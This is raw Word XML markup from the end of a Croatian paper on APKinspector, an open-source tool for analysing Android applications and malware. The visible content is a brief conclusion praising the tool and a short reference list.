        </w:rPr>
        <w:t>Preporučuje se da put projekta ne sadrži razmake jer bi mogli prouzročiti nefunkcionalnost</w:t>
      </w:r>
      <w:r w:rsidR="00062D1C">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00062D1C" w:rsidRPr="00D5261B" w:rsidRDefault="00062D1C" w:rsidP="00D5261B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Za sve nedoumice može se kontaktirati autora ovoga dokumenta na valerio.frankovic@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750888" w:rsidRDefault="00750888" w:rsidP="006E27DD">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc113812271"/>
      <w:bookmarkStart w:id="102" w:name="_Toc159987577"/>
      <w:bookmarkStart w:id="103" w:name="_Toc406756522"/>
      <w:bookmarkStart w:id="104" w:name="_Toc406756635"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Zaključak</w:t>
      </w:r>
      <w:bookmarkStart w:id="105" w:name="_Toc73793800"/>
      <w:bookmarkStart w:id="106" w:name="_Toc73794370"/>
      <w:bookmarkStart w:id="107" w:name="_Toc113812272"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRPr="00ED13B2" w:rsidRDefault="003B69C9" w:rsidP="007F3C1F">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">APKinspector je vrlo moćan program kada ispravno radi. </w:t>
      </w:r>
      <w:r w:rsidR="00BB7257">
        <w:t xml:space="preserve">Izuzev naporne instalacije, pravo je zadovoljstvo raditi s ovim programom. </w:t>
      </w:r>
      <w:r>
        <w:t>Omogućuje cijeli niz alata počevši od grafa, Dalvik, Byte i Smali kodova pa do rekonstrukcije izvornog koda</w:t>
      </w:r>
      <w:r w:rsidR="007F3C1F">
        <w:t>, ulaznih i izlaznih poziva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F3C1F">
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prikaza AndroidManifest.xml-a. </w:t>
      </w:r>
      <w:r w:rsidR="00BB7257">
        <w:t>Mogu se vidjeti i svi korišteni Stringovi, razredi te metode pa je time a</w:t>
      </w:r>
      <w:r>
        <w:t>naliza zloćudnog koda svakako olakšana</w:t>
      </w:r>
      <w:r w:rsidR="00BB7257">
        <w:t xml:space="preserve"> jer analitičari imaju mnogo opcija za odabir tehnike analize</w:t>
      </w:r>
      <w:r w:rsidR="007F3C1F">
        <w:t>, a i sam program je jednostavan za korištenje</w:t>
      </w:r>
      <w:r>
        <w:t>. Program je još uvijek u razvojnoj fazi</w:t>
      </w:r>
      <w:r w:rsidR="00BB7257">
        <w:t xml:space="preserve"> te je program otvorenog koda tako da su svi zainteresirani pozvani da sudjeluju u razvoju ovog programa, a kad bude dovršen</w:t>
      </w:r>
      <w:r>
        <w:t>, sigurno će biti standardni ala</w:t>
      </w:r>
      <w:r w:rsidR="00BB7257">
        <w:t>t svakoga reverznog analitičara koji se bavi otkrivanjem zloćudnih programa za Android operativni sustav.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750888" w:rsidRDefault="006E27DD" w:rsidP="00A56AEA">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc159987578"/>
      <w:bookmarkStart w:id="109" w:name="_Toc406756523"/>
      <w:bookmarkStart w:id="110" w:name="_Toc406756636"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="00750888">
        <w:t>Literatura</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="00CD3E67" w:rsidRDefault="00CD3E67" w:rsidP="00CD3E67">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] APKinspector. </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="00F66B15">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="en-US" w:bidi="fa-IR"/>
          </w:rPr>
          <w:t>https://code.google.com/p/apkinspector/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BB7257" w:rsidRDefault="00BB7257" w:rsidP="00BB7257">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00CD3E67">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7257">
        <w:t>APKInspector BETA Demo [GSOC 2011]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidR="007F3C1F" w:rsidRPr="00F66B15">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=X538N-x3UUY</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DE5302" w:rsidRDefault="00CD3E67" w:rsidP="00BB7257">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="00DE5302">
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">] Android developers. </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidR="00DE5302" w:rsidRPr="00F66B15">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="en-US" w:bidi="fa-IR"/>
          </w:rPr>
          <w:t>http://developer.android.com/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00BB7257" w:rsidP="00BB7257">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00CD3E67">
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>] Dunham K., Hartman S., Quintans M., Morales J. A., Strazzere T. (2014). Android Malware and Analysis. Boca Raton, FL: CRC Press.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00BB7257" w:rsidP="00BB7257">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00CD3E67">
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="007F3C1F">
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 2.7.9 documentation. </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidR="007F3C1F" w:rsidRPr="00F66B15">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="en-US" w:bidi="fa-IR"/>
          </w:rPr>
          <w:t>https://docs.python.org/2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F3C1F" w:rsidRPr="00BB7257" w:rsidRDefault="007F3C1F" w:rsidP="00BB7257">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00ED13B2" w:rsidP="00ED13B2"/>
    <w:p w:rsidR="00F048A7" w:rsidRPr="00750888" w:rsidRDefault="00F048A7" w:rsidP="00750888"/>
    <w:sectPr w:rsidR="00F048A7" w:rsidRPr="00750888" w:rsidSect="00374865">
      <w:headerReference w:type="even" r:id="rId62"/>
      <w:headerReference w:type="default" r:id="rId63"/>
      <w:footerReference w:type="default" r:id="rId64"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1701" w:right="1134" w:bottom="1701" w:left="1701" w:header="680" w:footer="68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3B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63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E0" w:rsidRPr="00C2068C" w:rsidRDefault="00925CE0" w:rsidP="00750888">
    <w:r>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00C2068C">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00C2068C">
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00C2068C">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>32</w:t>
    </w:r>
    <w:r w:rsidRPr="00C2068C">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00925CE0" w:rsidRDefault="00925CE0" w:rsidP="00750888"/>
  <w:p w:rsidR="00925CE0" w:rsidRDefault="00925CE0" w:rsidP="00750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E0" w:rsidRDefault="00925CE0" w:rsidP="00F73319">
    <w:pPr>
      <w:pStyle w:val="Podnoje"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="Brojstranice"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="Brojstranice"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="Brojstranice"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="007E53A3">
      <w:rPr>
        <w:rStyle w:val="Brojstranice"/>
        <w:noProof/>
      </w:rPr>
      <w:t>50</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="Brojstranice"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00925CE0" w:rsidRDefault="00925C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3B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63B3" w:rsidP="00750888"/>
    <w:p w:rsidR="00AB63B3" w:rsidRDefault="00AB63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E0" w:rsidRPr="00350ADB" w:rsidRDefault="00925CE0" w:rsidP="00750888">
    <w:r w:rsidRPr="00350ADB">
      <w:t>Kvaliteta usluge u OpenBSD-u</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00925CE0" w:rsidRDefault="00925CE0" w:rsidP="00750888"/>
  <w:p w:rsidR="00925CE0" w:rsidRDefault="00925CE0" w:rsidP="0075088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E0" w:rsidRDefault="00925CE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E0" w:rsidRDefault="00925CE0">
    <w:pPr>
      <w:pStyle w:val="Zaglavlje"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00925CE0" w:rsidRDefault="00925C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630"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A1E442E"/>
    <w:lvl w:ilvl="0" w:tplc="0409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2FE036C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C68462C0"/>
    <w:lvl w:ilvl="0" w:tplc="0409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2EB7CAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F1A8EF8"/>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
    <w:nsid w:val="19F21495"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0798D032"/>
    <w:lvl w:ilvl="0" w:tplc="0409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24DE10FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AC6B088"/>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2748225F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ABE53D8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>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2E9B23EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B0ECA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30B7BF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE901F56"/>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3358663A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31AA8D8E"/>
    <w:lvl w:ilvl="0" w:tplc="0409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40EE2193"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="649AC5E4"/>
    <w:lvl w:ilvl="0" w:tplc="0409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42E16A15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25BE5D9E"/>
    <w:lvl w:ilvl="0" w:tplc="0409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479A28DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="493C088A"/>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53005C5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96FE3814"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="612" w:hanging="612"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>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3">
    <w:nsid w:val="5BCB4B99"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4740F1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Naslov3"/>
      <w:lvlText w:val="%1.%2.%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4">
    <w:nsid w:val="5E231D6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56A45D00"/>
    <w:lvl w:ilvl="0" w:tplc="0409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60321F4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F27C46E8"/>
    <w:lvl w:ilvl="0" w:tplc="BE42591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60D93B2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF463442"/>
    <w:lvl w:ilvl="0" w:tplc="F356AC20">
      <w:start w:val="4"/>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61DF7AEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CEC61F0E"/>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650121B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C03683E6"/>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6F7663B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3FA70D6"/>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7D6C5C34"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9F0444E"/>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7E154C4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B46BB18"/>
    <w:lvl w:ilvl="0" w:tplc="0409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13"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="2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025"/>
    <w:rsid w:val="00002480"/>
    <w:rsid w:val="00005D05"/>
    <w:rsid w:val="00006377"/>
    <w:rsid w:val="00010059"/>
    <w:rsid w:val="00012366"/>
    <w:rsid w:val="00017289"/>
    <w:rsid w:val="00022822"/>
    <w:rsid w:val="000231EF"/>
    <w:rsid w:val="00024B86"/>
    <w:rsid w:val="00031252"/>
    <w:rsid w:val="0003403B"/>
    <w:rsid w:val="00040DF8"/>
    <w:rsid w:val="00041518"/>
    <w:rsid w:val="0004372D"/>
    <w:rsid w:val="0004434F"/>
    <w:rsid w:val="00047249"/>
    <w:rsid w:val="00047A38"/>
    <w:rsid w:val="00051CC8"/>
    <w:rsid w:val="000607B8"/>
    <w:rsid w:val="00062D1C"/>
    <w:rsid w:val="0006312E"/>
    <w:rsid w:val="00063FF6"/>
    <w:rsid w:val="000745CD"/>
    <w:rsid w:val="00075239"/>
    <w:rsid w:val="00081B9D"/>
    <w:rsid w:val="00081DA8"/>
    <w:rsid w:val="000854BD"/>
    <w:rsid w:val="0009230B"/>
    <w:rsid w:val="00095430"/>
    <w:rsid w:val="000A36E2"/>
    <w:rsid w:val="000A453E"/>
    <w:rsid w:val="000B2F27"/>
    <w:rsid w:val="000B3501"/>
    <w:rsid w:val="000C0B6F"/>
    <w:rsid w:val="000C1B1C"/>
    <w:rsid w:val="000C77D4"/>
    <w:rsid w:val="000D4224"/>
    <w:rsid w:val="000E0225"/>
    <w:rsid w:val="000E32C5"/>
    <w:rsid w:val="000E42AA"/>
    <w:rsid w:val="000F1765"/>
    <w:rsid w:val="000F4C42"/>
    <w:rsid w:val="00101B25"/>
    <w:rsid w:val="00102072"/>
    <w:rsid w:val="001129F9"/>
    <w:rsid w:val="00116372"/>
    <w:rsid w:val="00117BF8"/>
    <w:rsid w:val="00123170"/>
    <w:rsid w:val="00131897"/>
    <w:rsid w:val="0013460D"/>
    <w:rsid w:val="00135025"/>
    <w:rsid w:val="00144CF4"/>
    <w:rsid w:val="001518DF"/>
    <w:rsid w:val="00152AC3"/>
    <w:rsid w:val="001547C4"/>
    <w:rsid w:val="0016394A"/>
    <w:rsid w:val="001730B1"/>
    <w:rsid w:val="001738CC"/>
    <w:rsid w:val="00173FCE"/>
    <w:rsid w:val="0017449F"/>
    <w:rsid w:val="00174810"/>
    <w:rsid w:val="00177A97"/>
    <w:rsid w:val="00183BA1"/>
    <w:rsid w:val="001963C0"/>
    <w:rsid w:val="001A1A6B"/>
    <w:rsid w:val="001A492C"/>
    <w:rsid w:val="001A50F3"/>
    <w:rsid w:val="001A5C28"/>
    <w:rsid w:val="001B7F77"/>
    <w:rsid w:val="001E12B3"/>
    <w:rsid w:val="001E3A95"/>
    <w:rsid w:val="001E78E1"/>
    <w:rsid w:val="001F2E0C"/>
    <w:rsid w:val="001F2EA9"/>
    <w:rsid w:val="002033D6"/>
    <w:rsid w:val="002055CA"/>
    <w:rsid w:val="00213CDE"/>
    <w:rsid w:val="002278AB"/>
    <w:rsid w:val="002341DD"/>
    <w:rsid w:val="00234680"/>
    <w:rsid w:val="00236678"/>
    <w:rsid w:val="002420D0"/>
    <w:rsid w:val="00246CDE"/>
    <w:rsid w:val="00254272"/>
    <w:rsid w:val="00255C85"/>
    <w:rsid w:val="00257A5C"/>
    <w:rsid w:val="00262406"/>
    <w:rsid w:val="00270F64"/>
    <w:rsid w:val="002724F7"/>
    <w:rsid w:val="00272CCD"/>
    <w:rsid w:val="0027593A"/>
    <w:rsid w:val="00294874"/>
    <w:rsid w:val="00296687"/>
    <w:rsid w:val="002967E1"/>
    <w:rsid w:val="00296C2D"/>
    <w:rsid w:val="002A2C73"/>
    <w:rsid w:val="002B1FC7"/>
    <w:rsid w:val="002B7038"/>
    <w:rsid w:val="002C1052"/>
    <w:rsid w:val="002C28C1"/>
    <w:rsid w:val="002C4557"/>
    <w:rsid w:val="002E1F11"/>
    <w:rsid w:val="002F2B1B"/>
    <w:rsid w:val="002F447F"/>
    <w:rsid w:val="002F5897"/>
    <w:rsid w:val="002F6364"/>
    <w:rsid w:val="00302246"/>
    <w:rsid w:val="003044F5"/>
    <w:rsid w:val="00313A15"/>
    <w:rsid w:val="00314E2B"/>
    <w:rsid w:val="00314E60"/>
    <w:rsid w:val="00315A07"/>
    <w:rsid w:val="0031725F"/>
    <w:rsid w:val="003210EE"/>
    <w:rsid w:val="003212C0"/>
    <w:rsid w:val="00326A38"/>
    <w:rsid w:val="00327448"/>
    <w:rsid w:val="00327E2E"/>
    <w:rsid w:val="003310D1"/>
    <w:rsid w:val="00331C16"/>
    <w:rsid w:val="0033620B"/>
    <w:rsid w:val="00343AF6"/>
    <w:rsid w:val="00352DC6"/>
    <w:rsid w:val="00354486"/>
    <w:rsid w:val="003550E7"/>
    <w:rsid w:val="00355D46"/>
    <w:rsid w:val="0036282C"/>
    <w:rsid w:val="00374865"/>
    <w:rsid w:val="00375489"/>
    <w:rsid w:val="00376A0D"/>
    <w:rsid w:val="003774F8"/>
    <w:rsid w:val="0038120C"/>
    <w:rsid w:val="00381297"/>
    <w:rsid w:val="00382D66"/>
    <w:rsid w:val="00384307"/>
    <w:rsid w:val="00386984"/>
    <w:rsid w:val="00394A8A"/>
    <w:rsid w:val="00396A57"/>
    <w:rsid w:val="003A045D"/>
    <w:rsid w:val="003A26AA"/>
    <w:rsid w:val="003A2C5B"/>
    <w:rsid w:val="003A5470"/>
    <w:rsid w:val="003A671D"/>
    <w:rsid w:val="003B3B23"/>
    <w:rsid w:val="003B3FE8"/>
    <w:rsid w:val="003B5C95"/>
    <w:rsid w:val="003B69C9"/>
    <w:rsid w:val="003B6EE5"/>
    <w:rsid w:val="003D0BED"/>
    <w:rsid w:val="003D144E"/>
    <w:rsid w:val="003D3568"/>
    <w:rsid w:val="003D36C9"/>
    <w:rsid w:val="003D4299"/>
    <w:rsid w:val="003D44DE"/>
    <w:rsid w:val="003E508B"/>
    <w:rsid w:val="003F0112"/>
    <w:rsid w:val="003F2447"/>
    <w:rsid w:val="003F3EF1"/>
    <w:rsid w:val="003F497D"/>
    <w:rsid w:val="003F6477"/>
    <w:rsid w:val="00400C18"/>
    <w:rsid w:val="00407446"/>
    <w:rsid w:val="00407E98"/>
    <w:rsid w:val="00420979"/>
    <w:rsid w:val="00432E70"/>
    <w:rsid w:val="004338AC"/>
    <w:rsid w:val="004451D1"/>
    <w:rsid w:val="0045692C"/>
    <w:rsid w:val="004575B2"/>
    <w:rsid w:val="0047024B"/>
    <w:rsid w:val="00476348"/>
    <w:rsid w:val="00480A45"/>
    <w:rsid w:val="004908B7"/>
    <w:rsid w:val="00493109"/>
    <w:rsid w:val="0049393B"/>
    <w:rsid w:val="00494B91"/>
    <w:rsid w:val="0049505E"/>
    <w:rsid w:val="00497621"/>
    <w:rsid w:val="004A3036"/>
    <w:rsid w:val="004A7A96"/>
    <w:rsid w:val="004A7EA4"/>
    <w:rsid w:val="004B549A"/>
    <w:rsid w:val="004B5660"/>
    <w:rsid w:val="004B57DF"/>
    <w:rsid w:val="004B7898"/>
    <w:rsid w:val="004B7E97"/>
    <w:rsid w:val="004C1214"/>
    <w:rsid w:val="004D1F7F"/>
    <w:rsid w:val="004D6E4D"/>
    <w:rsid w:val="004E1DF2"/>
    <w:rsid w:val="004F49C6"/>
    <w:rsid w:val="004F6167"/>
    <w:rsid w:val="00500539"/>
    <w:rsid w:val="00501EAA"/>
    <w:rsid w:val="00502CE4"/>
    <w:rsid w:val="005043EE"/>
    <w:rsid w:val="005054CF"/>
    <w:rsid w:val="005061FB"/>
    <w:rsid w:val="00507238"/>
    <w:rsid w:val="00511B34"/>
    <w:rsid w:val="00515446"/>
    <w:rsid w:val="00515742"/>
    <w:rsid w:val="0051789A"/>
    <w:rsid w:val="0052262A"/>
    <w:rsid w:val="00523BBA"/>
    <w:rsid w:val="00524BB1"/>
    <w:rsid w:val="005373A8"/>
    <w:rsid w:val="00543B59"/>
    <w:rsid w:val="00543EB8"/>
    <w:rsid w:val="00550FF0"/>
    <w:rsid w:val="00551045"/>
    <w:rsid w:val="005515CE"/>
    <w:rsid w:val="00553ED9"/>
    <w:rsid w:val="00563C2C"/>
    <w:rsid w:val="00564045"/>
    <w:rsid w:val="005679E8"/>
    <w:rsid w:val="00574004"/>
    <w:rsid w:val="00580049"/>
    <w:rsid w:val="00580902"/>
    <w:rsid w:val="00583777"/>
    <w:rsid w:val="005843CE"/>
    <w:rsid w:val="00587492"/>
    <w:rsid w:val="00590FD0"/>
    <w:rsid w:val="00591F82"/>
    <w:rsid w:val="005922AA"/>
    <w:rsid w:val="00594343"/>
    <w:rsid w:val="005A1253"/>
    <w:rsid w:val="005A212E"/>
    <w:rsid w:val="005A44D9"/>
    <w:rsid w:val="005A52AA"/>
    <w:rsid w:val="005A6EE0"/>
    <w:rsid w:val="005B204E"/>
    <w:rsid w:val="005B2603"/>
    <w:rsid w:val="005B707F"/>
    <w:rsid w:val="005C2012"/>
    <w:rsid w:val="005C3F8B"/>
    <w:rsid w:val="005C4370"/>
    <w:rsid w:val="005C4B01"/>
    <w:rsid w:val="005C5554"/>
    <w:rsid w:val="005D0582"/>
    <w:rsid w:val="005D2F4C"/>
    <w:rsid w:val="005D36DA"/>
    <w:rsid w:val="005D568E"/>
    <w:rsid w:val="005D6599"/>
    <w:rsid w:val="005E1C7F"/>
    <w:rsid w:val="005E319F"/>
    <w:rsid w:val="005E4AF9"/>
    <w:rsid w:val="005E4FAB"/>
    <w:rsid w:val="005F4A8F"/>
    <w:rsid w:val="005F74F7"/>
    <w:rsid w:val="005F7BF1"/>
    <w:rsid w:val="00603010"/>
    <w:rsid w:val="0061170B"/>
    <w:rsid w:val="00611A1D"/>
    <w:rsid w:val="0061669D"/>
    <w:rsid w:val="006205DE"/>
    <w:rsid w:val="00622F4F"/>
    <w:rsid w:val="00635225"/>
    <w:rsid w:val="0065633C"/>
    <w:rsid w:val="00662B4B"/>
    <w:rsid w:val="00662E54"/>
    <w:rsid w:val="00667338"/>
    <w:rsid w:val="00670B49"/>
    <w:rsid w:val="006728B9"/>
    <w:rsid w:val="00673E8B"/>
    <w:rsid w:val="00674776"/>
    <w:rsid w:val="0067490C"/>
